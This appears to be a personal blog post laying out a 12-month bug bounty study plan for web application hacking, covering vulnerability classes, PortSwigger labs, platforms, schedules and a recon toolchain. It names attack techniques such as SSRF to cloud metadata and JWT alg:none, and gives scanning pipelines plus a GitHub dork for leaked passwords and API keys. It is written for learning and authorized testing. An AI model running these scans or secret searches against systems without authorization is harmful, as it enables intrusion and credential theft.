Bug Bounty $100,000 Roadmap — 12-Month Plan

I had claude help me make a 12 month plan and I am going to do it. 2026 is already 25% over. I do not want to waste any more time. I also used some info from this post by Justin Gardner (@Rhynorater)

I will spend as much time on Bug Bounty as I possibly can starting this Thursday, 26th March 2026.

Profile: BS Cybersecurity | A+, Net+, Sec+, Pentest+, CySA+, ISC2 SSCP

Commitment: 40+ hours/week

Track: Web Application Hacking

Math

To hit $100k, you need roughly one of these scenarios:

  • 10–15 high-severity bugs at $5k–$10k each
  • 3–5 critical bugs at $15k–$30k each + a handful of mediums
  • 50–80 medium bugs at $1k–$2k each

The plan below optimizes for the middle path: specialize fast, get your first bounties within 90 days, then compound skills to chase criticals.

Overview

Phase Months Focus Earning Target
1 1–2 Foundation & tooling $0 (building skills)
2 3–4 Core vuln classes + first bounties $500–$2,000
3 5–7 Advanced techniques & chaining $5k–$15k total
4 8–12 Full hunter mode $85k–$100k+ total

Phase 1 — Months 1–2: Foundation (~350 hrs total)

JavaScript — 40 hours

Resource: javascript.info (free) — complete Parts 1 and 2

Focus on:

  • DOM manipulation
  • document.location, innerHTML, eval()
  • Event listeners and fetch()
  • How cookies work in JS
  • postMessage and cross-origin communication

Practice: Open any website, open DevTools, read their JS files. Try to understand what data flows where.

DOM XSS, client-side logic flaws, and postMessage vulnerabilities are all high-payout and invisible if you can’t read JS.

Burp Suite Mastery — 30 hours

Resource: PortSwigger Web Security Academy (free) — Burp Suite-specific sections

Learn:

  • Intruder, Repeater, Comparer, Decoder, Logger
  • Match-and-replace rules
  • Writing Burp extensions in Python (Montoya API)
  • Setting up FoxyProxy
  • Intercepting mobile apps with Burp

HTTP & Web Fundamentals — 20 hours

Learn:

  • Every HTTP status code and what it means in a bug context
  • CORS, SameSite cookies, CSP headers
  • How OAuth 2.0 flows work at the protocol level

Practice: Use curl for everything — it forces you to understand what Burp is doing under the hood.

PortSwigger Academy Labs — Ongoing

Start these in week 1, run in parallel with everything else. Goal: 50 labs completed by end of month 2.

Priority order:

  1. SQL injection
  2. XSS (all three types)
  3. CSRF
  4. Access control
  5. Authentication

Phase 1 Goals (by day 60)

  • Solve 50 PortSwigger labs
  • Read JS well enough to spot sources and sinks
  • Write a basic XSS payload from scratch without looking it up
  • Understand every HTTP verb and common header
  • Set up a full local Burp proxy environment

Phase 2 — Months 3–4: Core Vulnerability Classes (~350 hrs)

Now you start hunting for real, alongside learning.

IDOR & Broken Access Control — 25 hours

This is the #1 source of first bounties for new hunters. Companies consistently miss these because they require understanding business logic, not just technical scanning.

What to do:

  • Every time you see a numeric ID in a URL or request body, try changing it
  • Look for UUIDs — people think they’re secure by obscurity; they’re not if leaked elsewhere
  • Test horizontal and vertical privilege escalation separately

Resources:

  • The “IDOR Bible” write-up by @r0x
  • Every HackerOne disclosed IDOR report (filter by “Broken Access Control” on HackerOne Hacktivity)

XSS Deep Dive — 25 hours

Go beyond <script>alert(1)</script>.

Learn:

  • Stored XSS in rich text editors, file uploads, profile fields
  • DOM XSS via location.hash, document.referrer, window.name
  • Filter bypass techniques — encoding, polyglots, SVG payloads, mutation XSS (mXSS)
  • How to use XSS Hunter to prove impact to triagers (this affects payout)

Resource: PortSwigger XSS labs — complete all of them including expert-level

SQLi, SSRF, XXE — 25 hours

SQL Injection:

  • Focus on blind and time-based — these are still found in the wild constantly
  • Learn sqlmap but understand what it’s doing under the hood

SSRF (Server-Side Request Forgery):

  • This is a high-payout vulnerability. Learn cloud metadata endpoints (169.254.169.254)
  • How to pivot SSRF to internal services
  • Blind SSRF via out-of-band (use Burp Collaborator or interactsh)

XXE:

  • File disclosure via external entity
  • Blind XXE via OOB

Resource: PortSwigger labs for all three categories

Auth & Session Attacks — 15 hours

Learn:

  • Password reset flow flaws (host header injection, token predictability, race conditions)
  • Session fixation and session puzzling
  • 2FA bypass techniques (code reuse, response manipulation, backup code flaws)

Resource: PortSwigger Authentication labs

Start Hunting in Month 3

Sign up for HackerOne and Bugcrowd. Start with programs that have “safe harbor” language and wide scope.

Good starting programs:

  • HackerOne’s own bug bounty program
  • U.S. Department of Defense VDP (great for learning, lower competition)
  • Large tech companies with broad scopes and fast triage

Your goal in month 3 is not money — it is getting your first report triaged, even if it comes back as N/A. The feedback is invaluable.

Phase 2 Goals (by day 120)

  • Submit first bug report (even if N/A)
  • Win first bounty (aim: $100–$500)
  • Complete HackTheBox or TryHackMe web labs
  • Build a personal recon methodology document
  • Read 20 disclosed reports on HackerOne Hacktivity
  • Set up a notes system (Obsidian or Notion) for your findings

Phase 3 — Months 5–7: Advanced Techniques & Chaining (~420 hrs)

Business Logic Flaws — 30 hours

These cannot be found by scanners. They require understanding what the app is supposed to do and figuring out how to make it do something it should not.

Examples:

  • Price manipulation and coupon stacking
  • Quantity overflows and negative values
  • Workflow bypasses (skipping steps in a multi-step process)
  • Race conditions — two simultaneous requests that each independently pass a check

Resources:

  • PortSwigger Business Logic labs
  • Every disclosed “logic” bug on HackerOne Hacktivity

OAuth / JWT / SSO Attacks — 25 hours

These are disproportionately high payout because:

  • They affect authentication, which is always critical impact
  • They are complex enough that most junior hunters cannot find them
  • Account takeover via OAuth is often a P1 ($10k+)

Learn:

  • state parameter CSRF in OAuth flows
  • Open redirect chaining to steal authorization codes
  • Token leakage via referrer header
  • JWT alg:none attack
  • JWT secret brute-forcing with hashcat
  • Implicit flow vulnerabilities

Resources:

  • PortSwigger OAuth labs (all of them)
  • “An Illustrated Guide to OAuth and OpenID Connect” (okta.com)

API Hacking — 25 hours

Every app has an API. Many are poorly documented and undertested.

Learn:

  • Mass assignment vulnerabilities (sending extra JSON fields the API accepts)
  • Excessive data exposure (API returns more data than the UI shows)
  • Broken Object Level Authorization (BOLA — essentially API-level IDOR)
  • Using Postman and REST Client to interact with APIs manually

Resources:

  • OWASP API Security Top 10
  • APIsec University (free)

GraphQL & WebSockets — 15 hours

GraphQL:

  • Introspection queries to map the entire API surface
  • Batch queries to bypass rate limiting
  • GraphQL injection

WebSockets:

  • Message tampering via Burp
  • Cross-site WebSocket hijacking

Resource: PortSwigger GraphQL labs

Bug Chaining — 20 hours

This is the skill that 10x’s your payouts. A medium-severity XSS combined with an information disclosure that leaks an admin token equals a critical account takeover.

Practice:

  • Every time you find a low-severity bug, ask: “what can I do with this?”
  • Study how top hunters chain bugs in their public write-ups

Resource: https://pentester.land/list-of-bug-bounty-writeups — filter for “chain” write-ups

Build Your Recon Automation Pipeline

Set this up and let it run in the background while you manually test.

# Basic recon pipeline
subfinder -d target.com | httpx -silent | nuclei -t nuclei-templates/

# Passive URL collection
echo target.com | gau | grep "?" | tee urls.txt
cat urls.txt | waybackurls >> urls.txt

# GitHub dorking
# Search: org:targetorg password OR secret OR api_key

Tools to install:

  • subfinder — subdomain enumeration
  • amass — in-depth DNS enumeration
  • httpx — HTTP probing
  • nuclei — template-based scanning
  • ffuf — fast web fuzzer
  • gau — get all URLs
  • waybackurls — Wayback Machine URL fetcher
  • notify — send alerts to Telegram or Discord

Phase 3 Goals (by day 210)

  • $5k–$15k earned total
  • 1–2 programs you know deeply (understand their tech stack and past findings)
  • Land first high-severity (P2) report
  • Automated recon pipeline running
  • Writing reports that get triaged without back-and-forth
  • Receive first private program invite

Phase 4 — Months 8–12: Full Hunter Mode

By now you have a niche, a methodology, and repeating income. The job now is volume combined with depth.

Weekly Time Split

  • 30 hours/week actively hunting on programs
  • 10 hours/week learning new techniques and reading write-ups

Pick One Niche to Go Expert-Level

The hunters who make $100k+ are known for something. Choose based on where you have found the most success:

Niche Why Payout Potential
OAuth / SSO Highest payouts, least competition P1 frequently ($10k–$30k)
Mobile API backends Poor security, undertested P1–P2 range
GraphQL Newer tech, overlooked everywhere P2–P1 range
Cloud misconfigs AWS/GCP misconfigs, metadata leaks Varies widely

Private Programs

  • HackerOne and Bugcrowd invite top hunters to private programs
  • Private programs have less competition, higher payouts, and broader scope
  • You get invites by: finding bugs, building reputation, and sometimes by directly asking program managers
  • Target: First private invite by month 6–7

Report Quality

A well-written report gets triaged faster, bounty paid sooner, and triagers remember you for future reports.

Every report must include:

  1. Vulnerability summary — one clear sentence describing the issue
  2. Steps to reproduce — numbered, explicit, anyone should be able to follow them
  3. Proof of concept — working exploit code, screenshots, or video walkthrough
  4. Impact statement — what can an attacker actually do with this? Be specific
  5. Suggested remediation — shows professionalism, speeds up triage

Phase 4 Goals (by month 12)

  • $85k–$100k+ earned total
  • Strong reputation score on HackerOne or Bugcrowd
  • 3+ active private program invites
  • At least one critical / P1 bug in your portfolio
  • Recognized niche specialization
  • Public write-up or conference talk (optional but accelerates invites)

Weekly Schedule

Time Block Activity
Mon–Fri mornings (4 hrs/day) Active hunting on chosen programs
Mon/Wed evenings (2 hrs each) PortSwigger labs or new technique study
Tue/Thu evenings (2 hrs each) Read 5 disclosed reports per session
Saturday (6–8 hrs) Deep dive on one new vulnerability class
Sunday (3–4 hrs) Write-up review, recon automation, program research

Platforms

Platform Notes
HackerOne Start here. Most beginner-friendly, most disclosed reports to learn from
Bugcrowd Good second platform once you have momentum
Intigriti European programs, less saturated
YesWeHack Less competitive than HackerOne
DoD VDP Unlimited scope, great for learning
Synack / Cobalt Avoid early on — curated, hard to get into as a new hunter

Learning Resources

Free

  • PortSwigger Web Security Academy — the single best resource on the internet for web hacking
  • The Bug Hunter’s Methodology — Jason Haddix on YouTube, must-watch
  • Nahamsec on YouTube/Twitch — one of the best hunters actively teaching
  • PentesterLand write-ups listhttps://pentester.land/list-of-bug-bounty-writeups
  • HackerOne Hacktivity — disclosed reports, sorted by bounty amount

Tools Reference

Essential Setup

# Install Go (required for most tools)
sudo pacman -S go

# Recon tools
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install -v github.com/ffuf/ffuf/v2@latest
go install -v github.com/lc/gau/v2/cmd/gau@latest
go install -v github.com/tomnomnom/waybackurls@latest

# Update nuclei templates
nuclei -update-templates

Burp Suite Extensions to Install

  • Autorize — automatic access control testing
  • Turbo Intruder — fast fuzzing beyond what Intruder can do
  • Logger++ — advanced request logging
  • JS Miner — extracts endpoints and secrets from JS files
  • Param Miner — discovers hidden parameters

Key Mindset Points

The first 60 days are the hardest.

Read more write-ups than you think you need to. The fastest way to learn to find bugs is to understand exactly how other people found them. Aim for 5 write-ups per day in months 1–4.

Go deep on programs, not wide.

Impact is everything. A bug is only worth what an attacker can do with it. Always ask: “can I chain this into something worse?” A self-XSS is N/A. A self-XSS that becomes account takeover via a CSRF is a P2.

Your reports are your reputation.

Last updated: March 2026